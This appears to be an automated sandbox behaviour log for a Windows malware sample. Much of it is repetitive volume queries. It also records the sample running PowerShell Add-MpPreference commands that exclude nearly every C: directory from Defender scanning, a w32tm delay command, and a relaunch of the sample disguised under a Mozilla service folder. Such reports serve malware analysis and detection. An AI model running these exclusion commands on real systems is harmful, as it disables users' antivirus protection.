                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe VolumeInformation
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
